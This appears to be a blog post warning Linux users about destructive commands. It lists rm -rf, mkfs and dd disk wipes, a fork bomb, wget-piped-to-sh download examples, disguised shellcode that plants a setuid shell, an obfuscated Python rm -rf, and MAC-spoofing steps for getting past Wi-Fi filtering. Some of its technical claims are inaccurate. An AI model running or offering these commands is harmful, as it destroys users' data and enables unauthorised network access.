This command shouldn't be run on
sudo rm -rf / (will delete all your files on your system) - required administrator rights!
sudo rm -rf . (will delete the current directory your in) - required administrator rights!
sudo rm -rf * (will delete all the files in the current folder) - required administrator rights!
rm -rf * or rm -rf *.* ( will delete all the files in the current folder) - No administrator rights needed!
rm -rf ~/ & ( will destroy your home directory) - No administrator rights needed
Commands which will erase hard disk
sudo mkfs (will format your hard drive) - required administrator rights!
sudo mkfs.ext3 ( will format your hard drive) - required administrator rights!
sudo mkfs.bfs ( will format your hard drive) - required administrator rights!
sudo mkfs.cramfs ( will format your hard drive) - No administrator rights needed!
sudo mkfs.ext2 (will format your hard drive) - required administrator rights!
sudo mkfs.minix (will format your hard drive) - required administrator rights!
sudo mkfs.msdos (will format your hard drive) - required administrator rights!
sudo mkfs.reiserfs (will format your hard drive) - required administrator rights!
sudo mkfs.vfat (will format your hard drive) - required administrator rights!
The dd command can be very dangerous, here are some examples, but remember that these can vary often!
sudo dd if=/dev/zero of=/dev/hda (MOST DANGEROUS COMMAND! It will zero out the whole primary IDE hard drive) ( required administrator rights)
sudo dd if=/dev/hda of=/dev/hdb (Needs administrator rights)
sudo dd if=something of=/dev/hda (Needs administrator rights)
WARNING: /dev/hda and /dev/hdb from the above example can be replaced with /dev/sda or /dev/sdb in the case of SATA and SCSI.
Block device manipulation: Causes raw data to be written to a block device. Often times this will strike violently the file system and cause total loss of data!
any_command > /dev/sda
dd if=something of=/dev/sda
Forkbomb : It is a malicious script that will execute a number of processes until your system freezes, this will force you to do a hard reboot which may cause damage to your system.
CODE :
:(){:|:&};:
CODE :
fork while fork
Tarbomb: Let's say that somebody who wants to help you, he offer a tar.gz or tar.bz2 archive and asks you to extract it into an existing directory. This archive can be crafted to explode into a billions of files, or inject other existing files into the system by guessing their filenames. You should make the habit of decompressing tar.gz or tar.bz2 archives inside a newly created empty directory!
Decompression bomb: Here's another example. Let's say somebody asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of Gigabites, filling your hard drive until it freezes! You should not touch data from an untrusted source!
Shellscript: This one is very dangrous! Somebody gives you a link to download, to a shellscript and then they will asks you to execute it. This script can contain dangerous command he chooses, and that will damage your system . Do not execute code from people you don't trust! Here are some examples:
CODE :
wget http://my_site/my_file
sh ./some_file
Example :
wget http://ceattingal.ac.in/malicious-script
sh ./malicious-script
or
wget http://my_site/my_file -O- | sh
Example :
wget http://ihrd.org/malicious-script -O- | sh
Compiling code: Some person gives you the source code to an application and tells you to compile it. It is easy to hide dangerous codes in side large wad of source code, the attacker can easly damage your system. So Do not compile or execute the compiled code unless the source is of some well-known application, obtained from a reputable site.
CODE :
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
"xffxffxffxffx68xdfxd0xdfxd9x68x8dx99"
"xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7"
"x56x04xf7x56x08xf7x56x0cx83xc4x74x56"
"x8dx73x08x56x53x54x59xb0x0bxcdx80x31"
"xc0x40xebxf9xe8xbdxffxffxffx2fx62x69"
"x6ex2fx73x68x00x2dx63x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
To the new and inexperienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root.
Here's another example of code that should definitely NOT be executed by anyone!
CODE : python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
Where "sn!.sg!+" is simply rm -rf * shifted a character up.
one more threat is that in Ubuntu we can actually change our machines MAC address,this process can be used to bypass MAC filtering for wifi security(where router is set to allow interten connection to a specific MAC address) now if u know what MAC address it allows to access the net u can change ur device mac address to that 2 surf net without the router owner's permission.Here is the code to change ur device MAC address
first u check ur MAC address by typing #ifconfig in terminal
now code for changing it
#ifconfig etho0 down
#ifconfig etho0 hw ether 1b:2a:4c:4d:8e(this is example u can put any MAC addres u want in place of this address)
#ifconfig etho up
that's it MAC address changed.... confirm the change by typing #ifconfig to see ur new MAC address
Please note I am giving this code for knowledge,learning purpose only I don't want to encourage people to do harm,I don't want to harm others.This thing is written so that people stay alert and safe.
0 comments:
Post a Comment